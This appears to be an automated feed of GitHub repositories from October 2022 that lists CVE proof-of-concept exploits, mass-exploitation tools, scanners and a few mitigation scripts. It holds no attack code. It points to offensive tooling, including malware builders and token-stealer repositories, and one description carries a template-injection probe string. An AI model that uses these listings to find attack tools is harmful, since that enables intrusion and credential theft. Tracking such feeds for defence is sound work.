**no description** : [jsongmax/terraMaster-CVE-2022-24990](https://github.com/jsongmax/terraMaster-CVE-2022-24990) create time: 2022-10-17T07:47:36Z

**no description** : [PyterSmithDarkGhost/CVE-2022-39197-POC](https://github.com/PyterSmithDarkGhost/CVE-2022-39197-POC) create time: 2022-10-17T07:26:51Z

**批量检测CVE-2021-46422 RCE漏洞** : [xanszZZ/SDT_CW3B1_rce](https://github.com/xanszZZ/SDT_CW3B1_rce) create time: 2022-10-16T09:23:56Z

**批量检测CVE-2022-26134 RCE漏洞** : [xanszZZ/ATLASSIAN-Confluence_rce](https://github.com/xanszZZ/ATLASSIAN-Confluence_rce) create time: 2022-10-16T09:19:56Z

**Capricornus(摩羯座)一款基于wxpython的GUI图形化漏洞检测工具,包含了基础的备忘录,base64加解密,批量漏洞和单项漏洞检测功能。目前包含CVE_2022_35914、CVE_2022_36804等nday,1day以及常见漏洞的检测** : [lolminerxmrig/Capricornus](https://github.com/lolminerxmrig/Capricornus) create time: 2022-10-16T08:08:31Z

**Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation** : [sxlmnwb/CVE-2017-1000253](https://github.com/sxlmnwb/CVE-2017-1000253) create time: 2022-10-16T23:08:16Z

**[CVE-2022-39802] File path traversal vulnerability in SAP Manufacturing Execution** : [redrays-io/CVE-2022-39802](https://github.com/redrays-io/CVE-2022-39802) create time: 2022-10-16T18:40:56Z

**[CVE-2022-39802] File path traversal vulnerability in SAP Manufacturing Execution** : [vah13/CVE-2022-39802](https://github.com/vah13/CVE-2022-39802) create time: 2022-10-16T18:40:27Z

**no description** : [paulotrindadec/CVE-2021-44103](https://github.com/paulotrindadec/CVE-2021-44103) create time: 2022-10-16T16:02:47Z

**Telesquare SDT-CW3B1 1.1.0 版本存在操作系统命令注入漏洞。远程攻击者可利用该漏洞在无需任何身份验证的情况下执行操作系统命令。** : [kailing0220/CVE-2021-46422](https://github.com/kailing0220/CVE-2021-46422) create time: 2022-10-16T15:24:45Z

**no description** : [Jackey0/CVE-2022-40664](https://github.com/Jackey0/CVE-2022-40664) create time: 2022-10-16T13:51:36Z

**漏洞检测** : [polerstar/CVE-2021-46422-poc](https://github.com/polerstar/CVE-2021-46422-poc) create time: 2022-10-16T13:00:59Z

**CVE-2021-46422poc** : [yyqxi/CVE-2021-46422](https://github.com/yyqxi/CVE-2021-46422) create time: 2022-10-16T11:34:26Z

**CVE-2022-26134poc** : [yyqxi/CVE-2022-26134](https://github.com/yyqxi/CVE-2022-26134) create time: 2022-10-16T11:48:42Z

**CVE-2022-26134** : [latings/CVE-2022-26134](https://github.com/latings/CVE-2022-26134) create time: 2022-10-16T11:37:33Z

**韩国的无线路由器 os cmd 注入** : [kelemaoya/CVE-2021-46422](https://github.com/kelemaoya/CVE-2021-46422) create time: 2022-10-16T11:01:58Z

**cve-2021-46422** : [CJ-0107/cve-2021-46422](https://github.com/CJ-0107/cve-2021-46422) create time: 2022-10-16T10:52:27Z

**cve-2022-26134** : [CJ-0107/cve-2022-26134](https://github.com/CJ-0107/cve-2022-26134) create time: 2022-10-16T10:55:12Z

**Confluence Server and Data Center存在一个远程代码执行漏洞,未经身份验证的攻击者可以利用该漏洞向目标服务器注入恶意ONGL表达式,进而在目标服务器上执行任意代码。** : [kelemaoya/CVE-2022-26134](https://github.com/kelemaoya/CVE-2022-26134) create time: 2022-10-16T10:44:51Z

**no description** : [RcsMonster/Nft-Grabber-Stealer-Exploit-Cve-2022-Steal-BlockHain-Hack-Nft](https://github.com/RcsMonster/Nft-Grabber-Stealer-Exploit-Cve-2022-Steal-BlockHain-Hack-Nft) create time: 2022-10-16T10:31:40Z

**CVE-2021-46422** : [latings/CVE-2021-46422](https://github.com/latings/CVE-2021-46422) create time: 2022-10-16T09:40:29Z

**no description** : [RcsMonster/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022](https://github.com/RcsMonster/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022) create time: 2022-10-16T10:21:03Z

**no description** : [RcsMonster/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022](https://github.com/RcsMonster/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022) create time: 2022-10-16T10:20:29Z

**Confluence Server and Data Center存在一个远程代码执行漏洞,未经身份验证的攻击者可以利用该漏洞向目标服务器注入恶意ONGL表达式,进而在目标服务器上执行任意代码。** : [kelemaoya/CVE-2022-26134](https://github.com/kelemaoya/CVE-2022-26134) create time: 2022-10-16T10:01:18Z

**SDT-CW3B1韩国的无线路由器 os cmd 注入PoC** : [ZAxyr/CVE-2021-46422](https://github.com/ZAxyr/CVE-2021-46422) create time: 2022-10-16T06:52:57Z

**Capricornus(摩羯座)一款基于wxpython的GUI图形化漏洞检测工具,包含了基础的备忘录,base64加解密,批量漏洞和单项漏洞检测功能。目前包含CVE_2022_35914、CVE_2022_36804等nday,1day以及常见漏洞的检测** : [qiwentaidi/Capricornus](https://github.com/qiwentaidi/Capricornus) create time: 2022-10-16T02:10:16Z

**no description** : [NeriaBasha/CVE-2022-40684](https://github.com/NeriaBasha/CVE-2022-40684) create time: 2022-10-16T00:23:16Z

**no description** : [thecasual/CVE-2022-41358](https://github.com/thecasual/CVE-2022-41358) create time: 2022-10-15T17:06:00Z

**Exploit for CVE-2022-40684 vulnerability** : [mohamedbenchikh/CVE-2022-40684](https://github.com/mohamedbenchikh/CVE-2022-40684) create time: 2022-10-15T17:02:49Z

**Fortinet Critical Authentication Bypass Vulnerability (CVE-2022-40684) [ Mass Exploit ]** : [Chocapikk/CVE-2022-40684](https://github.com/Chocapikk/CVE-2022-40684) create time: 2022-10-15T16:51:25Z

**在受影响的Confluence Server 和Data Center 版本中,存在一个OGNL 注入漏洞,该漏洞允许未经身份验证的攻击者在Confluence Server 或Data Center 服务器上执行任意代码。** : [kailing0220/CVE-2022-26134](https://github.com/kailing0220/CVE-2022-26134) create time: 2022-10-15T15:56:41Z

**no description** : [yigexioabai/CVE-2021-46422_RCE](https://github.com/yigexioabai/CVE-2021-46422_RCE) create time: 2022-10-15T15:13:48Z

**FortiPWN exploit for CVE-2022-40684 authentication bypass vulnerability affecting FortiOS, FortiProxy and FortiSwitchManager appliances.** : [mohamedbenchikh/FortiPWN](https://github.com/mohamedbenchikh/FortiPWN) create time: 2022-10-15T14:12:01Z

**no description** : [yigexioabai/CVE-2021-46422-RCE](https://github.com/yigexioabai/CVE-2021-46422-RCE) create time: 2022-10-15T06:01:53Z

**ProxyNotShell(CVE-2022-41082/CVE-2022-41040) all analyze, mitigation script and a python wrapper to acieve RCE for Proxynotshell** : [backcr4t/CVE-2022-41082-RCE-POC](https://github.com/backcr4t/CVE-2022-41082-RCE-POC) create time: 2022-10-15T13:43:51Z

**CVE-2021-46422漏洞** : [Awei507/CVE-2021-46422](https://github.com/Awei507/CVE-2021-46422) create time: 2022-10-15T12:46:31Z

**CVE-2022-3236 Unauthenticated rce in sophos User Portal and Webadmin components mass exploitation tool** : [n0npro/CVE-2022-3236-RCE-POC](https://github.com/n0npro/CVE-2022-3236-RCE-POC) create time: 2022-10-15T12:43:46Z

**exploit for CVE-2022-40684 Fortinet** : [ClickCyber/cve-2022-40684](https://github.com/ClickCyber/cve-2022-40684) create time: 2022-10-15T11:34:17Z

**u think that it doesnt but it do** : [xen0bit/CVE-2022-37434_poc](https://github.com/xen0bit/CVE-2022-37434_poc) create time: 2022-10-15T00:29:38Z

**Authenticated Remote Command Execution in Gitlab via GitHub import.** : [Malwareman007/CVE-2022-2992](https://github.com/Malwareman007/CVE-2022-2992) create time: 2022-10-14T20:47:51Z

**no description** : [ITPATJIDR/CVE-2022-41040](https://github.com/ITPATJIDR/CVE-2022-41040) create time: 2022-10-14T17:01:17Z

**CVE-2022-41852 Proof of Concept** : [Warxim/CVE-2022-41852](https://github.com/Warxim/CVE-2022-41852) create time: 2022-10-14T12:09:19Z

**CVE-40684-2022** : [hackingyseguridad/cve-40684-2022](https://github.com/hackingyseguridad/cve-40684-2022) create time: 2022-10-14T12:03:48Z

**no description** : [mhd108/CVE-2022-40684](https://github.com/mhd108/CVE-2022-40684) create time: 2022-10-14T11:00:40Z

**no description** : [iveresk/CVE-2022-40684](https://github.com/iveresk/CVE-2022-40684) create time: 2022-10-14T10:53:50Z

**CVE-2022-40684 Remote Fortinet Code Exeuction vulnerability** : [Carl0sV1e1ra/CVE-2022-40684](https://github.com/Carl0sV1e1ra/CVE-2022-40684) create time: 2022-10-14T09:57:22Z

**automated script for exploiting CVE-2007-2447** : [Aviksaikat/CVE-2007-2447](https://github.com/Aviksaikat/CVE-2007-2447) create time: 2022-10-14T09:01:29Z

**Multi-threaded Mass adding ssh keys for CVE-2022-40648** : [b3wT/CVE-2022-40648-MASS](https://github.com/b3wT/CVE-2022-40648-MASS) create time: 2022-10-14T08:51:21Z

**This repository contains potential security patches for the Magento APSB22-48 and CVE-2022-35698 security vulnerability** : [EmicoEcommerce/Magento-APSB22-48-Security-Patches](https://github.com/EmicoEcommerce/Magento-APSB22-48-Security-Patches) create time: 2022-10-14T04:58:26Z

**no description** : [secunnix/CVE-2022-40684](https://github.com/secunnix/CVE-2022-40684) create time: 2022-10-14T01:07:01Z

**Exploit for CVE-2022-40684 affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager** : [kljunowsky/CVE-2022-40684-POC](https://github.com/kljunowsky/CVE-2022-40684-POC) create time: 2022-10-13T21:07:50Z

**CVE-2022-37298 Shinken Monitoring** : [dbyio/cve-2022-37298-shinken](https://github.com/dbyio/cve-2022-37298-shinken) create time: 2022-10-13T21:07:02Z

**Bash PoC for Fortinet Auth Bypass - CVE-2022-40684** : [Filiplain/Fortinet-PoC-Auth-Bypass](https://github.com/Filiplain/Fortinet-PoC-Auth-Bypass) create time: 2022-10-13T19:53:17Z

**PoC for CVE-2022-40684 - Authentication bypass lead to Full device takeover (Read-only)** : [carlosevieira/CVE-2022-40684](https://github.com/carlosevieira/CVE-2022-40684) create time: 2022-10-13T18:13:59Z

**Adobe Reader DC Information Leak Exploit** : [hacksysteam/CVE-2021-45067](https://github.com/hacksysteam/CVE-2021-45067) create time: 2022-10-13T16:42:10Z

**A proof of concept exploit for CVE-2022-40684 affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager** : [horizon3ai/CVE-2022-40684](https://github.com/horizon3ai/CVE-2022-40684) create time: 2022-10-13T14:24:12Z

**Arbitrary code execution analysis based on Telerik-UI. This will be done so that the article can be read by others. The document provides an in-depth explanation of the various vectors involved with Telerik-UI for ASP.NET AJAX, as well as POST requests, the architecture of ASP.NET AJAX,** : [KasunPriyashan/Unrestricted-File-Upload-by-Weak-Encryption-affected-versions-CVE-2017-11317-Remote-Code-Execut](https://github.com/KasunPriyashan/Unrestricted-File-Upload-by-Weak-Encryption-affected-versions-CVE-2017-11317-Remote-Code-Execut) create time: 2022-10-13T14:19:12Z

**Unrestricted File Upload by Weak Encryption affected versions (CVE-2017-11317) 2. Remote Code Execution by Insecure Deserialization - (CVE-2019-18935)** : [KasunPriyashan/Telerik-UI-ASP.NET-AJAX-Exploitation](https://github.com/KasunPriyashan/Telerik-UI-ASP.NET-AJAX-Exploitation) create time: 2022-10-13T14:21:31Z

**CVE-2022-23277 POC to write a webshell to aspnet_client** : [7BitsTeam/CVE-2022-23277](https://github.com/7BitsTeam/CVE-2022-23277) create time: 2022-10-13T13:35:18Z

**CVE-2022-40684-RCE-POC fortinet auth bypass analyze and exploit** : [Z4r4s/CVE-2022-40684-RCE-POC](https://github.com/Z4r4s/CVE-2022-40684-RCE-POC) create time: 2022-10-13T13:12:14Z

**no description** : [RealAlphaMan/CVE-2022-2992](https://github.com/RealAlphaMan/CVE-2022-2992) create time: 2022-10-13T10:54:06Z

**CVE-2022-40684-RCE-POC Fortinet Vulnerability** : [Car1osVieira/CVE-2022-40684-RCE-POC](https://github.com/Car1osVieira/CVE-2022-40684-RCE-POC) create time: 2022-10-13T10:27:53Z

**CVE-2022-40684, affecting multiple #Fortinet solutions, is an auth bypass that allows remote attackers to interact with all management API endpoints.** : [Gh0zts/CVE-2022-40684-MASS-RCE](https://github.com/Gh0zts/CVE-2022-40684-MASS-RCE) create time: 2022-10-13T09:54:05Z

**no description** : [MariliaMeira/CVE-2019-14287](https://github.com/MariliaMeira/CVE-2019-14287) create time: 2022-10-12T23:33:05Z

**RCE Exploit and Research** : [RashidKhanPathan/CVE-2022-40471](https://github.com/RashidKhanPathan/CVE-2022-40471) create time: 2022-10-12T22:33:31Z

**no description** : [edsonjt81/CVE-2022-0847-DirtyPipe-](https://github.com/edsonjt81/CVE-2022-0847-DirtyPipe-) create time: 2022-10-12T18:26:55Z

**fortinet auth bypass analyze and exploit** : [Br4velwd/CVE-2022-40684-RCE-POC](https://github.com/Br4velwd/CVE-2022-40684-RCE-POC) create time: 2022-10-12T14:32:15Z

**test for CVE-2022-0002 ">2 {{9*9}}** : [nikokosm/CVE-2022-0002--s-1](https://github.com/nikokosm/CVE-2022-0002--s-1) create time: 2022-10-12T12:54:54Z

**fortinet auth bypass analyze and exploit** : [Noxus007/CVE-2022-40684-RCE-POC](https://github.com/Noxus007/CVE-2022-40684-RCE-POC) create time: 2022-10-12T12:30:48Z

**no description** : [6E6L6F/CVE-2022-35914](https://github.com/6E6L6F/CVE-2022-35914) create time: 2022-10-12T11:42:08Z

**no description** : [r00t4dm/Jenkins-CVE-2015-8103](https://github.com/r00t4dm/Jenkins-CVE-2015-8103) create time: 2022-10-12T09:10:36Z

**no description** : [r00t4dm/Jenkins-CVE-2016-9299](https://github.com/r00t4dm/Jenkins-CVE-2016-9299) create time: 2022-10-12T09:26:54Z

**no description** : [r00t4dm/Jenkins-CVE-2017-1000353](https://github.com/r00t4dm/Jenkins-CVE-2017-1000353) create time: 2022-10-12T09:30:38Z

**Remote shell on CVE-2009-4623** : [MonsempesSamuel/CVE-2009-4623](https://github.com/MonsempesSamuel/CVE-2009-4623) create time: 2022-10-12T06:47:12Z

**CVE-2022-40684, affecting multiple #Fortinet solutions, is an auth bypass that allows remote attackers to execude code via rest api** : [s0crate7/CVE-2022-40684-POC](https://github.com/s0crate7/CVE-2022-40684-POC) create time: 2022-10-12T06:53:18Z

**CVE-2022-40684-RCE-POC Fortinet Vulnerability** : [CarlosV1e1ra/CVE-2022-40684-RCE-POC](https://github.com/CarlosV1e1ra/CVE-2022-40684-RCE-POC) create time: 2022-10-11T19:12:06Z

**Compled version of CVE-2022-0847 aka Dirty Pipe. Just one shot to root them all :D** : [badboy-sft/Dirty-Pipe-Oneshot](https://github.com/badboy-sft/Dirty-Pipe-Oneshot) create time: 2022-10-11T17:17:48Z

**PoC and writeup for CVE-2022-41082. is a SSRF vulnerability which leads to remote code execution (RCE) when PowerShell is accessible to the attacker. a very problematic issue for sys admins** : [y4b4n/CVE-2022-41082-RCE-POC](https://github.com/y4b4n/CVE-2022-41082-RCE-POC) create time: 2022-10-11T13:52:49Z

**CVE-2021-3129-Laravel Debug mode** : [0nion1/CVE-2021-3129](https://github.com/0nion1/CVE-2021-3129) create time: 2022-10-11T08:53:05Z

**polkit priv esc: pkexec out of boundary exploit** : [Pixailz/CVE-2021-4034](https://github.com/Pixailz/CVE-2021-4034) create time: 2022-10-10T22:56:09Z

**mass rce for ProxyNotShell** : [t0mby/CVE-2022-41082-MASS-RCE](https://github.com/t0mby/CVE-2022-41082-MASS-RCE) create time: 2022-10-10T15:45:32Z

**cve-2022-41352 poc** : [segfault-it/cve-2022-41352](https://github.com/segfault-it/cve-2022-41352) create time: 2022-10-10T13:04:34Z

**no description** : [SecLabResearchBV/CVE-2022-34718-PoC](https://github.com/SecLabResearchBV/CVE-2022-34718-PoC) create time: 2022-10-03T11:39:25Z

**CVE-2018-8587复现** : [Sunqiz/CVE-2018-8587-reproduction](https://github.com/Sunqiz/CVE-2018-8587-reproduction) create time: 2022-10-10T05:57:17Z

**testtesttesttesttesttesttesttesttesttest** : [realyme/CVE-2022-31479-test](https://github.com/realyme/CVE-2022-31479-test) create time: 2022-10-10T03:47:18Z

**test漏洞** : [exam-jcfxu/CVE-2022-test](https://github.com/exam-jcfxu/CVE-2022-test) create time: 2022-10-10T02:57:02Z

**no description** : [0bfxgh0st/cve-2014-6271](https://github.com/0bfxgh0st/cve-2014-6271) create time: 2022-10-10T01:44:07Z

**Script to check for IOC's created by ProxyNotShell (CVE-2022-41040 & CVE-2022-41082)** : [rjsudlow/proxynotshell-IOC-Checker](https://github.com/rjsudlow/proxynotshell-IOC-Checker) create time: 2022-10-09T21:15:00Z

**Detecting CVE-2022-26134 using Nuclei** : [skhalsa-sigsci/CVE-2022-26134-LAB](https://github.com/skhalsa-sigsci/CVE-2022-26134-LAB) create time: 2022-10-09T17:15:07Z

**CVE-2022-41040 - Server Side Request Forgery (SSRF) in Microsoft Exchange Server** : [kljunowsky/CVE-2022-41040-POC](https://github.com/kljunowsky/CVE-2022-41040-POC) create time: 2022-10-09T15:27:40Z

**Automatic scanning (Shodan) and exploitation (PoC) script for the GLPI htmLawed vulnerability (CVE-2022_35914).** : [franckferman/GLPI-htmLawed-CVE-2022_35914-PoC](https://github.com/franckferman/GLPI-htmLawed-CVE-2022_35914-PoC) create time: 2022-10-09T13:20:21Z

**CVE-2022-40684: Critical Authentication Bypass in FortiOS and FortiProxy** : [dickson0day/CVE-2022-40684](https://github.com/dickson0day/CVE-2022-40684) create time: 2022-10-09T10:54:17Z

**no description** : [xiaobaiakai/CVE-2022-35914](https://github.com/xiaobaiakai/CVE-2022-35914) create time: 2022-10-09T07:46:58Z

**no description** : [xiaobaiakai/CVE-2022-35914](https://github.com/xiaobaiakai/CVE-2022-35914) create time: 2022-10-09T06:14:08Z

**repair** : [4nth0ny1130/CVE-2022-39197-fix_patch](https://github.com/4nth0ny1130/CVE-2022-39197-fix_patch) create time: 2022-10-09T04:06:23Z

**Open Web Analytics (OWA) - Unauthenticated Remote Code Execution** : [hupe1980/CVE-2022-24637](https://github.com/hupe1980/CVE-2022-24637) create time: 2022-10-08T21:12:35Z

**🤯 Exploit for sudo heap overflow.** : [iyamroshan/CVE-2021-3156](https://github.com/iyamroshan/CVE-2021-3156) create time: 2022-10-08T15:53:25Z

**Grafana - Directory Traversal and Arbitrary File Read** : [hupe1980/CVE-2021-43798](https://github.com/hupe1980/CVE-2021-43798) create time: 2022-10-08T15:31:19Z

**This is a exploit for CVE-2019-9053** : [zmiddle/Simple_CMS_SQLi](https://github.com/zmiddle/Simple_CMS_SQLi) create time: 2022-10-08T14:20:48Z

**no description** : [7BitsTeam/exch_CVE-2021-42321](https://github.com/7BitsTeam/exch_CVE-2021-42321) create time: 2022-10-08T13:00:23Z

**ProxyNotShell and CVE-2022-41040 and CVE-2022-41082** : [gitzero0/ProxyNotShell](https://github.com/gitzero0/ProxyNotShell) create time: 2022-10-08T13:37:33Z

**no description** : [7BitsTeam/exch_CVE-2021-42321](https://github.com/7BitsTeam/exch_CVE-2021-42321) create time: 2022-10-08T12:33:43Z

**no description** : [uisvit/CVE-2022-32548-MASS-RCE](https://github.com/uisvit/CVE-2022-32548-MASS-RCE) create time: 2022-10-08T12:05:41Z

**Authenticated Remote Command Execution in Gitlab via GitHub import** : [CsEnox/CVE-2022-2992](https://github.com/CsEnox/CVE-2022-2992) create time: 2022-10-08T11:42:49Z

**mass rce for ProxyNotShell** : [t0mby/CVE-2022-41082-RCE](https://github.com/t0mby/CVE-2022-41082-RCE) create time: 2022-10-08T10:33:51Z

**Samples of the "qs" vulnerability CVE-2022-24999** : [n8tz/CVE-2022-24999](https://github.com/n8tz/CVE-2022-24999) create time: 2022-04-18T06:46:49Z

**no description** : [htarsoo/CVE-2020-26878](https://github.com/htarsoo/CVE-2020-26878) create time: 2022-10-08T08:38:00Z

**MASS SCANNER FOR PROXYNOTSHELL (CVE-2022-41082 & CVE-2022-41040)** : [b3wT/CVE-2022-41082-MASS-SCANNER](https://github.com/b3wT/CVE-2022-41082-MASS-SCANNER) create time: 2022-10-08T08:36:10Z

**CVE-2022-41082-RCE-POC aka ProxyNotShell** : [kevibeaumont/CVE-2022-41082-RCE-POC](https://github.com/kevibeaumont/CVE-2022-41082-RCE-POC) create time: 2022-10-08T07:50:19Z

**CVE-2022-41040-RCE-POC aka ProxyNotShell** : [kevibeaumont/CVE-2022-41040-RCE-POC](https://github.com/kevibeaumont/CVE-2022-41040-RCE-POC) create time: 2022-10-08T07:47:45Z

**Лабораторная работа по Веб-технологиям** : [stepancar-web-programming/2022-fall-lab-portfolio-cvetkov-vyacheslav-andreevich](https://github.com/stepancar-web-programming/2022-fall-lab-portfolio-cvetkov-vyacheslav-andreevich) create time: 2022-10-08T06:53:14Z

**TP-Link Tapo c200 ver <1.1.15 - Remote Code Execution (RCE)** : [1x019/CVE-2021-4045](https://github.com/1x019/CVE-2021-4045) create time: 2022-10-08T04:18:14Z

**patched to work** : [ZephrFish/Exch-CVE-2021-26855_Priv](https://github.com/ZephrFish/Exch-CVE-2021-26855_Priv) create time: 2021-03-15T12:33:04Z

**POC Of CVE-2022-26937** : [Malwareman007/CVE-2022-26937](https://github.com/Malwareman007/CVE-2022-26937) create time: 2022-10-07T18:08:09Z

**POC Of CVE-2022-21971** : [Malwareman007/CVE-2022-21971](https://github.com/Malwareman007/CVE-2022-21971) create time: 2022-10-07T17:25:03Z

**Save the trouble to open the burpsuite...Please do not use it for illegal purposes.** : [Keith-amateur/cve-2022-1040](https://github.com/Keith-amateur/cve-2022-1040) create time: 2022-10-07T14:44:42Z

**PoC for CVE-2021-29156** : [5amu/CVE-2021-29156](https://github.com/5amu/CVE-2021-29156) create time: 2022-10-07T10:18:44Z

**CVE-2022-31629 POC** : [SilNex/CVE-2022-31629-poc](https://github.com/SilNex/CVE-2022-31629-poc) create time: 2022-10-07T08:15:23Z

**Python implementation for NotProxyShell aka CVE-2022-40140 & CVE-2022-41082** : [ZephrFish/NotProxyShellScanner](https://github.com/ZephrFish/NotProxyShellScanner) create time: 2022-10-07T08:10:00Z

**1-day case study** : [Sechack06/CVE-2022-34918](https://github.com/Sechack06/CVE-2022-34918) create time: 2022-10-07T08:06:32Z

**CVE-2022-41082-RCE-POC aka ProxyNotShell** : [kevbeaumont/CVE-2022-41082-RCE-POC](https://github.com/kevbeaumont/CVE-2022-41082-RCE-POC) create time: 2022-10-06T22:18:44Z

**CVE-2022-41040-RCE-POC aka ProxyNotShell** : [kevbeaumont/CVE-2022-41040-RCE-POC](https://github.com/kevbeaumont/CVE-2022-41040-RCE-POC) create time: 2022-10-06T22:16:30Z

**Лабораторная работа по Веб-технологиям** : [belebeba/20222-fall-lab-portfolio-cvetkov-vyacheslav-andreevich](https://github.com/belebeba/20222-fall-lab-portfolio-cvetkov-vyacheslav-andreevich) create time: 2022-10-06T20:56:25Z

**Лабораторная работа по Веб-технологиям** : [belebeba/2022-fall-lab-portfolio-cvetkov-vyacheslav-andreevich](https://github.com/belebeba/2022-fall-lab-portfolio-cvetkov-vyacheslav-andreevich) create time: 2022-10-06T20:41:22Z

**A PoC exploit for the Apache Any23 <=2.5 RCE vulnerability** : [jsharp6968/cve_2021_40146](https://github.com/jsharp6968/cve_2021_40146) create time: 2022-10-06T17:46:10Z

**this is a demo attack of FOLLINA exploit , a vulnerability that has been discovered in May 2022 and stood unpatched until June 2022** : [Imeneallouche/Follina-attack-CVE-2022-30190-](https://github.com/Imeneallouche/Follina-attack-CVE-2022-30190-) create time: 2022-10-06T11:41:43Z

**ProxyNotShell fully automated mass rce** : [V1rpo/CVE-2022-41082-MASS-RCE](https://github.com/V1rpo/CVE-2022-41082-MASS-RCE) create time: 2022-10-06T10:34:33Z

**CVE-2022-41082 aka ProxyNotShell** : [kev-beaumont/CVE-2022-41082-RCE-POC](https://github.com/kev-beaumont/CVE-2022-41082-RCE-POC) create time: 2022-10-06T08:22:38Z

**CVE-2022-41040 aka Proxynotshell** : [kev-beaumont/CVE-2022-41040-RCE-POC](https://github.com/kev-beaumont/CVE-2022-41040-RCE-POC) create time: 2022-10-06T08:18:55Z

**CVE 2016-6210 OpenSSH 7.2p2 Time response vulnerability to enumerate usernames** : [Tardcircus/CVE2016-6210](https://github.com/Tardcircus/CVE2016-6210) create time: 2022-10-06T01:52:30Z

**Code set relating to CVE-2022-41040** : [d3duct1v/CVE-2022-41040](https://github.com/d3duct1v/CVE-2022-41040) create time: 2022-10-06T01:20:32Z

**no description** : [Everdoh/CVE-2013-6490](https://github.com/Everdoh/CVE-2013-6490) create time: 2022-10-05T18:53:09Z

**no description** : [Everdoh/CVE-2017-12561](https://github.com/Everdoh/CVE-2017-12561) create time: 2022-10-05T18:40:09Z

**no description** : [0bfxgh0st/cve-2010-2075](https://github.com/0bfxgh0st/cve-2010-2075) create time: 2022-10-03T02:57:21Z

**no description** : [qiwentaidi/CVE-2022-36804](https://github.com/qiwentaidi/CVE-2022-36804) create time: 2022-10-05T12:02:57Z

**no description** : [V1v3ns/CVE-2022-41082-RCE](https://github.com/V1v3ns/CVE-2022-41082-RCE) create time: 2022-10-05T04:03:27Z

**CVE-2022-41040-RCE-POC aka ProxyNotShell** : [kevin-beaum0nt/CVE-2022-41040-RCE-POC](https://github.com/kevin-beaum0nt/CVE-2022-41040-RCE-POC) create time: 2022-10-04T17:36:06Z

**CVE-2022-41082-RCE-POC aka ProxyNotShell** : [kevin-beaum0nt/CVE-2022-41082-RCE-POC](https://github.com/kevin-beaum0nt/CVE-2022-41082-RCE-POC) create time: 2022-10-04T17:32:17Z

**mitigation script for MS Exchange server vuln** : [r3dcl1ff/CVE-2022-41040](https://github.com/r3dcl1ff/CVE-2022-41040) create time: 2022-10-04T14:07:18Z

**no description** : [AruiBlog/CVE-2022-35914-GUI](https://github.com/AruiBlog/CVE-2022-35914-GUI) create time: 2022-10-04T14:04:38Z

**Лабораторная работа по Веб-технологиям** : [hgkufjbknhmlj/2022-fall-lab-portfolio-CvetkovVyacheslavAndreevich](https://github.com/hgkufjbknhmlj/2022-fall-lab-portfolio-CvetkovVyacheslavAndreevich) create time: 2022-10-04T13:15:32Z

**Atlassian Bitbucket Server and Data Center - Command Injection Vulnerability (CVE-2022-36804)** : [ColdFusionX/CVE-2022-36804](https://github.com/ColdFusionX/CVE-2022-36804) create time: 2022-10-04T08:26:12Z

**一款针对Vcenter的综合利用工具,包含目前最主流的CVE-2021-21972、CVE-2021-21985以及CVE-2021-22205,提供一键上传webshell,命令执行或者上传公钥使用SSH连接** : [Schira4396/VcenterKiller](https://github.com/Schira4396/VcenterKiller) create time: 2022-10-04T03:39:27Z

**CVE-2022-41082-RCE-POC aka ProxyNotShell** : [kevin-beaumont/CVE-2022-41082-RCE-POC](https://github.com/kevin-beaumont/CVE-2022-41082-RCE-POC) create time: 2022-10-04T03:59:27Z

**CVE-2022-41040-RCE-POC Aka ProxyNotShell** : [kevin-beaumont/CVE-2022-41040-RCE-POC](https://github.com/kevin-beaumont/CVE-2022-41040-RCE-POC) create time: 2022-10-04T03:50:10Z

**no description** : [trhacknon/CVE-2022-26134-miam](https://github.com/trhacknon/CVE-2022-26134-miam) create time: 2022-06-13T01:25:39Z

**no description** : [CentarisCyber/CVE-2022-41040_Mitigation](https://github.com/CentarisCyber/CVE-2022-41040_Mitigation) create time: 2022-10-03T17:36:13Z

**Place holder for CVE-2022-39959** : [usmarine2141/CVE-2022-39959](https://github.com/usmarine2141/CVE-2022-39959) create time: 2022-10-03T16:59:06Z

**CVE-2022-41082 and CVE-2022-41040 (ProxyNotShell) mass scanner** : [b3w7/CVE-2022-41082-Scanner](https://github.com/b3w7/CVE-2022-41082-Scanner) create time: 2022-10-03T12:35:30Z

**Mass exploitation tool for ProxyNotShell (CVE-2022-41082/CVE-2022-41040) supports multi threading and written in python** : [0xR0o7/CVE-2022-41082-MASS-RCE](https://github.com/0xR0o7/CVE-2022-41082-MASS-RCE) create time: 2022-10-03T12:09:27Z

**no description** : [JinHao-L/PoC-for-CVE-2020-28948-CVE-2020-28949](https://github.com/JinHao-L/PoC-for-CVE-2020-28948-CVE-2020-28949) create time: 2022-10-03T10:10:11Z

**CVE-2022-41082 is a SSRF vulnerability which leads to remote code execution (RCE) when PowerShell is accessible to the attacker. a very problematic issue for sys admins** : [krc0m/CVE-2022-41082-POC](https://github.com/krc0m/CVE-2022-41082-POC) create time: 2022-10-03T05:57:11Z

**CVE-2022-41040-RCE-POC aka ProxyNotShell** : [k1vin-beaumont/CVE-2022-41040-RCE-POC](https://github.com/k1vin-beaumont/CVE-2022-41040-RCE-POC) create time: 2022-10-03T05:05:11Z

**CVE-2022-41082-RCE-POC aka ProxyShell** : [k1vin-beaumont/CVE-2022-41082-RCE-POC](https://github.com/k1vin-beaumont/CVE-2022-41082-RCE-POC) create time: 2022-10-03T04:54:38Z

**CVE-2017-9805 POC** : [Shakun8/CVE-2017-9805](https://github.com/Shakun8/CVE-2017-9805) create time: 2022-10-03T00:15:31Z

**no description** : [Senz4wa/CVE-2021-3493](https://github.com/Senz4wa/CVE-2021-3493) create time: 2022-10-02T19:44:45Z

**no description** : [Senz4wa/CVE-2021-4034](https://github.com/Senz4wa/CVE-2021-4034) create time: 2022-10-02T19:42:24Z

**CVE-2022-41040 nuclei template** : [numanturle/CVE-2022-41040](https://github.com/numanturle/CVE-2022-41040) create time: 2022-10-02T11:26:57Z

**no description** : [L34ked/CVE-2022-41208](https://github.com/L34ked/CVE-2022-41208) create time: 2022-10-02T09:53:33Z

